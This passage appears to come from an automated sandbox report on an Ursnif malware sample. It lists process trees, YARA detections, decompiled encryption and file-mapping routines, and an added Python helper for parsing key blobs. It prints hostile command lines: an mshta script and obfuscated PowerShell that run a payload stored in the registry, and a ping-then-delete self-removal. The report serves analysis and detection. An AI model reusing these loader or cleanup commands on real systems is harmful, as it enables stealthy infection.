                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 272
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:7
                          Start time:04:06:14
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 396
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:11
                          Start time:04:06:19
                          Start date:26/05/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 424
                          Imagebase:0xf30000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:24
                          Start time:04:06:57
                          Start date:26/05/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff7fd340000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:26
                          Start time:04:06:59
                          Start date:26/05/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff746f80000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:27
                          Start time:04:06:59
                          Start date:26/05/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7c9170000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:28
                          Start time:04:07:09
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdline
                          Imagebase:0x7ff729ff0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          Target ID:29
                          Start time:04:07:11
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"
                          Imagebase:0x7ff639440000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:30
                          Start time:04:07:15
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdline
                          Imagebase:0x7ff729ff0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET

                          Target ID:33
                          Start time:04:07:17
                          Start date:26/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"
                          Imagebase:0x7ff639440000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:34
                          Start time:04:07:18
                          Start date:26/05/2022
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff61b8e0000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                          Target ID:37
                          Start time:04:07:25
                          Start date:26/05/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff6b8cf0000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:44
                          Start time:04:07:44
                          Start date:26/05/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lokvQRcUe0.dll
                          Imagebase:0x7ff63f4a0000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:45
                          Start time:04:07:45
                          Start date:26/05/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7c9170000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language


                            Execution Graph

                            Execution Coverage:10%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:14
                            Total number of Limit Nodes:2

                            Callgraph

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.278334254.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.278330403.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278347125.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278350774.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278353950.000000000040E000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278358414.0000000000413000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278361545.0000000000416000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.278385412.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                            Similarity
                            • API ID: BinaryType
                            • String ID:
                            • API String ID: 3726996659-0
                            • Opcode ID: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                            • Instruction ID: 678d90c2e14f759a0a694654a23e79d3ffc57d339712660e24010735e9a51d0b
                            • Opcode Fuzzy Hash: 445511c6e937446b3ab29b19c79851b54fb7788d52c464d718082ff33a7e5e7a
                            • Instruction Fuzzy Hash: 424176B0A00205CFDB08DFA8C5953AA7BB1EB45308F64816ED405AF3A1C73AD946CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • RtlInitializeCriticalSection.NTDLL(04F8A428), ref: 04F700FA
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F7012B
                            • RtlInitializeCriticalSection.NTDLL(0631C2D0), ref: 04F7013C
                              • Part of subcall function 04F75261: RtlInitializeCriticalSection.NTDLL(04F8A400), ref: 04F75285
                              • Part of subcall function 04F75261: RtlInitializeCriticalSection.NTDLL(04F8A3E0), ref: 04F7529B
                              • Part of subcall function 04F75261: GetVersion.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752AC
                              • Part of subcall function 04F75261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752E0
                              • Part of subcall function 04F78452: RtlAllocateHeap.NTDLL(00000000,-00000003,774B9EB0), ref: 04F7846C
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,04F69100,?), ref: 04F70165
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70176
                            • CloseHandle.KERNEL32(000005C8,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F7018A
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04F701D3
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F701E6
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04F701FB
                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04F7022B
                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70240
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F7024A
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70257
                            • GetShellWindow.USER32 ref: 04F70272
                            • GetWindowThreadProcessId.USER32(00000000), ref: 04F70279
                            • memcpy.NTDLL(04F8A2F4,?,00000018,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F702B5
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,04F69100,?), ref: 04F70333
                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04F7035D
                            • OpenEventA.KERNEL32(00100000,00000000,0631B9C8,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70385
                            • CreateEventA.KERNEL32(04F8A1E8,00000001,00000000,0631B9C8,?,?,?,?,?,?,?,04F69100,?), ref: 04F7039A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F703A0
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F70438
                            • SetEvent.KERNEL32(?,04F7C384,00000000,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F704CE
                            • RtlAllocateHeap.NTDLL(00000000,00000043,04F7C384), ref: 04F704E3
                            • wsprintfA.USER32 ref: 04F70513
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                            • String ID:
                            • API String ID: 3929413950-0
                            • Opcode ID: edb7c52d7a60bc854ba3f0ccd374ac8ccf779e63bc84937524d2b9aabbee3e8e
                            • Instruction ID: 278c2db538fc033ccbfeed652707175e875030bd9771062f0a47a701fc0e73c0
                            • Opcode Fuzzy Hash: edb7c52d7a60bc854ba3f0ccd374ac8ccf779e63bc84937524d2b9aabbee3e8e
                            • Instruction Fuzzy Hash: 17C15AB5A00648AFD720EF65F88893A7BE8EB85704B14481FE546DB210DB7DB846CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 189 4a15fbb-4a15ffb CryptAcquireContextW 190 4a16001-4a1603d memcpy CryptImportKey 189->190 191 4a16152-4a16158 GetLastError 189->191 193 4a16043-4a16055 CryptSetKeyParam 190->193 194 4a1613d-4a16143 GetLastError 190->194 192 4a1615b-4a16162 191->192 196 4a16129-4a1612f GetLastError 193->196 197 4a1605b-4a16064 193->197 195 4a16146-4a16150 CryptReleaseContext 194->195 195->192 200 4a16132-4a1613b CryptDestroyKey 196->200 198 4a16066-4a16068 197->198 199 4a1606c-4a16079 call 4a16d63 197->199 198->199 201 4a1606a 198->201 204 4a16120-4a16127 199->204 205 4a1607f-4a16088 199->205 200->195 201->199 204->200 206 4a1608b-4a16093 205->206 207 4a16095 206->207 208 4a16098-4a160b5 memcpy 206->208 207->208 209 4a160d0-4a160df CryptDecrypt 208->209 210 4a160b7-4a160ce CryptEncrypt 208->210 211 4a160e5-4a160e7 209->211 210->211 212 4a160f7-4a16102 GetLastError 211->212 213 4a160e9-4a160f3 211->213 215 4a16104-4a16114 212->215 216 4a16116-4a1611e call 4a16c2c 212->216 213->206 214 4a160f5 213->214 214->215 215->200 216->200
                            C-Code - Quality: 58%
                            			E04A15FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                            				int _v8;
                            				long* _v12;
                            				int _v16;
                            				BYTE* _v20;
                            				long* _v24;
                            				void* _v39;
                            				char _v40;
                            				void _v56;
                            				int _v60;
                            				intOrPtr _v64;
                            				void _v67;
                            				char _v68;
                            				void* _t61;
                            				int _t68;
                            				signed int _t76;
                            				int _t79;
                            				int _t81;
                            				int _t85;
                            				long _t86;
                            				int _t90;
                            				signed int _t94;
                            				int _t101;
                            				BYTE* _t102;
                            				int _t103;
                            				void* _t104;
                            				void* _t105;
                            				void* _t106;
                            
                            				_t103 = __eax;
                            				_t94 = 6;
                            				_v68 = 0;
                            				memset( &_v67, 0, _t94 << 2);
                            				_t105 = _t104 + 0xc;
                            				asm("stosw");
                            				asm("stosb");
                            				_v40 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				asm("stosb");
                            				_t61 =  *0x4a1a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                            				if(_t61 == 0) {
                            					_a8 = GetLastError();
                            				} else {
                            					_t101 = 0x10;
                            					memcpy( &_v56, _a8, _t101);
                            					_t106 = _t105 + 0xc;
                            					_v60 = _t101;
                            					_v67 = 2;
                            					_v64 = 0x660e;
                            					_v68 = 8;
                            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                            					if(_t68 == 0) {
                            						_a8 = GetLastError();
                            					} else {
                            						_push(0);
                            						_push( &_v40);
                            						_push(1);
                            						_push(_v12);
                            						if( *0x4a1a0e4() == 0) {
                            							_a8 = GetLastError();
                            						} else {
                            							_t18 = _t103 + 0xf; // 0x10
                            							_t76 = _t18 & 0xfffffff0;
                            							if(_a4 != 0 && _t76 == _t103) {
                            								_t76 = _t76 + _t101;
                            							}
                            							_t102 = E04A16D63(_t76);
                            							_v20 = _t102;
                            							if(_t102 == 0) {
                            								_a8 = 8;
                            							} else {
                            								_v16 = 0;
                            								_a8 = 0;
                            								while(1) {
                            									_t79 = 0x10;
                            									_v8 = _t79;
                            									if(_t103 <= _t79) {
                            										_v8 = _t103;
                            									}
                            									memcpy(_t102, _a12, _v8);
                            									_t81 = _v8;
                            									_a12 = _a12 + _t81;
                            									_t103 = _t103 - _t81;
                            									_t106 = _t106 + 0xc;
                            									if(_a4 == 0) {
                            										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                            									} else {
                            										_t85 =  *0x4a1a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                            									}
                            									if(_t85 == 0) {
                            										break;
                            									}
                            									_t90 = _v8;
                            									_v16 = _v16 + _t90;
                            									_t102 =  &(_t102[_t90]);
                            									if(_t103 != 0) {
                            										continue;
                            									} else {
                            										L17:
                            										 *_a16 = _v20;
                            										 *_a20 = _v16;
                            									}
                            									goto L21;
                            								}
                            								_t86 = GetLastError();
                            								_a8 = _t86;
                            								if(_t86 != 0) {
                            									E04A16C2C(_v20);
                            								} else {
                            									goto L17;
                            								}
                            							}
                            						}
                            						L21:
                            						CryptDestroyKey(_v12);
                            					}
                            					CryptReleaseContext(_v24, 0);
                            				}
                            				return _a8;
                            			}






























Per-line addresses of the listing above (aligned with the C-code in the original report): 0x04a15fc4 to 0x04a16162.

                            APIs
                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04A124D8,00000001,04A158D7,00000000), ref: 04A15FF3
                            • memcpy.NTDLL(04A124D8,04A158D7,00000010,?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740), ref: 04A1600C
                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04A16035
                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04A1604D
                            • memcpy.NTDLL(00000000,746BC740,055395B0,00000010), ref: 04A1609F
                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055395B0,00000020,?,?,00000010), ref: 04A160C8
                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,055395B0,?,?,00000010), ref: 04A160DF
                            • GetLastError.KERNEL32(?,?,00000010), ref: 04A160F7
                            • GetLastError.KERNEL32 ref: 04A16129
                            • CryptDestroyKey.ADVAPI32(00000000), ref: 04A16135
                            • GetLastError.KERNEL32 ref: 04A1613D
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04A1614A
                            • GetLastError.KERNEL32(?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A16152
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                            • String ID:
                            • API String ID: 1967744295-0
                            • Opcode ID: 81dc3523e4ec4ae55ae517fe5790a2506838bdb125b4f3434960bc9e5ff1305d
                            • Instruction ID: 883345a2dfd7dc623f7428777ab21aae15396e5850ca0021381fb4465bfde6dc
                            • Opcode Fuzzy Hash: 81dc3523e4ec4ae55ae517fe5790a2506838bdb125b4f3434960bc9e5ff1305d
                            • Instruction Fuzzy Hash: F75109B1901209FFEB10DFA4DC84AAEBBB9FB04350F048429F905E7260D775AE15DB61
                            Uniqueness

                            Uniqueness Score: -1.00%
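The CryptoAPI sequence in this function (CryptAcquireContextW with provider type 0x18, which is PROV_RSA_AES, and flags 0xF0000000, which is CRYPT_VERIFYCONTEXT; a 16-byte memcpy into a buffer; CryptImportKey with a 0x1C-byte blob; CryptSetKeyParam with dwParam 1, which is KP_IV; then CryptEncrypt or CryptDecrypt) is the standard way to load a raw symmetric key through a PLAINTEXTKEYBLOB. The Python below is an added example, not code from the report or from the sample: it builds and parses that blob layout so an analyst can check what a 0x1C-byte blob implies (8-byte BLOBHEADER, 4-byte key length, 16-byte key). The algorithm identifier and key bytes in it are constructed for illustration; the real key and ALG_ID live at the addresses the memcpy reads and are not shown in this excerpt.

```python
import struct

# wincrypt.h constants. The three that appear in the call trace above are
# PROV_RSA_AES (dwProvType 0x18), CRYPT_VERIFYCONTEXT (dwFlags 0xF0000000) and KP_IV (dwParam 1).
PROV_RSA_AES = 0x18
CRYPT_VERIFYCONTEXT = 0xF0000000
KP_IV = 0x1
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
BLOBHEADER_LEN = 8                         # bType, bVersion, reserved (2 bytes), aiKeyAlg (4 bytes)
PLAINTEXT_HDR_LEN = BLOBHEADER_LEN + 4     # plus the DWORD key length that precedes the key bytes

ALG_NAMES = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES", 0x6609: "CALG_3DES_112",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256", 0x6801: "CALG_RC4",
}


def build_plaintext_key_blob(alg_id, key):
    """Serialize a PLAINTEXTKEYBLOB exactly as CryptImportKey expects it (little-endian fields)."""
    return struct.pack("<BBHII", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + bytes(key)


def parse_plaintext_key_blob(blob):
    """Return (algorithm name, key bytes) for a blob recovered from memory.
    Raises ValueError when the header or the declared key length is inconsistent."""
    if len(blob) < PLAINTEXT_HDR_LEN:
        raise ValueError("blob shorter than BLOBHEADER plus key length field")
    btype, bver, _reserved, alg_id, key_len = struct.unpack_from("<BBHII", blob, 0)
    if btype != PLAINTEXTKEYBLOB or bver != CUR_BLOB_VERSION:
        raise ValueError("not a version-2 PLAINTEXTKEYBLOB (bType=0x%02x, bVersion=%d)" % (btype, bver))
    if len(blob) != PLAINTEXT_HDR_LEN + key_len:
        raise ValueError("declared key length %d does not match blob size %d" % (key_len, len(blob)))
    return ALG_NAMES.get(alg_id, "ALG_ID 0x%04x" % alg_id), blob[PLAINTEXT_HDR_LEN:]


def key_length_from_blob_size(dw_data_len):
    """Invert the size arithmetic: dwDataLen as passed to CryptImportKey minus the 12-byte header."""
    if dw_data_len < PLAINTEXT_HDR_LEN:
        raise ValueError("dwDataLen 0x%x is too small for a PLAINTEXTKEYBLOB" % dw_data_len)
    return dw_data_len - PLAINTEXT_HDR_LEN


if __name__ == "__main__":
    # Constructed demo key; the CryptImportKey call above passes dwDataLen = 0x1C.
    demo_key = bytes(range(16))
    blob = build_plaintext_key_blob(0x660E, demo_key)
    print("blob size 0x%x, key length implied by 0x1C: %d" % (len(blob), key_length_from_blob_size(0x1C)))
    print(parse_plaintext_key_blob(blob))
```

When pulling the blob out of the memory dump, take the 12 bytes immediately before the 16-byte key (the buffer the first memcpy fills) and run them through parse_plaintext_key_blob: the ALG_ID in the header tells you which cipher the key belongs to, and the KP_IV call that follows tells you the 16 bytes copied just before CryptEncrypt/CryptDecrypt are the IV.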

                            Control-flow Graph

                            C-Code - Quality: 74%
                            			E04A176BB(intOrPtr __edx, void** _a4, void** _a8) {
                            				intOrPtr _v8;
                            				struct _FILETIME* _v12;
                            				short _v56;
                            				struct _FILETIME* _t12;
                            				intOrPtr _t13;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr _t27;
                            				long _t28;
                            				void* _t30;
                            
                            				_t27 = __edx;
                            				_t12 =  &_v12;
                            				GetSystemTimeAsFileTime(_t12);
                            				_push(0x192);
                            				_push(0x54d38000);
                            				_push(_v8);
                            				_push(_v12);
                            				L04A18244();
                            				_push(_t12);
                            				_v12 = _t12;
                            				_t13 =  *0x4a1a348; // 0xb1d5a8
                            				_t5 = _t13 + 0x4a1b87a; // 0x5538e22
                            				_t6 = _t13 + 0x4a1b594; // 0x530025
                            				_push(0x16);
                            				_push( &_v56);
                            				_v8 = _t27;
                            				L04A17EAA();
                            				_t17 = CreateFileMappingW(0xffffffff, 0x4a1a34c, 4, 0, 0x1000,  &_v56); // executed
                            				_t30 = _t17;
                            				if(_t30 == 0) {
                            					_t28 = GetLastError();
                            				} else {
                            					if(GetLastError() == 0xb7) {
                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                            						if(_t21 == 0) {
                            							_t28 = GetLastError();
                            							if(_t28 != 0) {
                            								goto L6;
                            							}
                            						} else {
                            							 *_a4 = _t30;
                            							 *_a8 = _t21;
                            							_t28 = 0;
                            						}
                            					} else {
                            						_t28 = 2;
                            						L6:
                            						CloseHandle(_t30);
                            					}
                            				}
                            				return _t28;
                            			}
Per-line addresses of the listing above (aligned with the C-code in the original report): 0x04a176bb to 0x04a1777d.

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?,?), ref: 04A176C7
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04A176DD
                            • _snwprintf.NTDLL ref: 04A17702
                            • CreateFileMappingW.KERNELBASE(000000FF,04A1A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04A1771E
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?), ref: 04A17730
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04A17747
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53), ref: 04A17768
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04A13DBA,?,?,4D283A53,?), ref: 04A17770
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: db65388d9e75b1968437f57320d44f09c83ca0143d3c2fa5c7336ad15aafba57
                            • Instruction ID: 846621a3b1afaf5388ed2bf7265dc68522704b9e62bd31fd6d8e1373825c40f7
                            • Opcode Fuzzy Hash: db65388d9e75b1968437f57320d44f09c83ca0143d3c2fa5c7336ad15aafba57
                            • Instruction Fuzzy Hash: 9621A5BA640204BBE711EB64DC45F9E77BEEB58750F240021F509E71A0E670A905CB50
                            Uniqueness

                            Uniqueness Score: -1.00%
